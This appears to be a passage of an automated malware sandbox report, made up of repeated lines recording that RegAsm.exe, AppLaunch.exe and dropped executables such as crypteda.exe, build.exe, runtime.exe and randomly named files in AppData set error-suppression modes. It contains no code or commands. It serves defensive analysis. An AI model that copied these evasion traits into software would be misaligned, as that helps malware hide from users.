Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000238002\Amadeus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
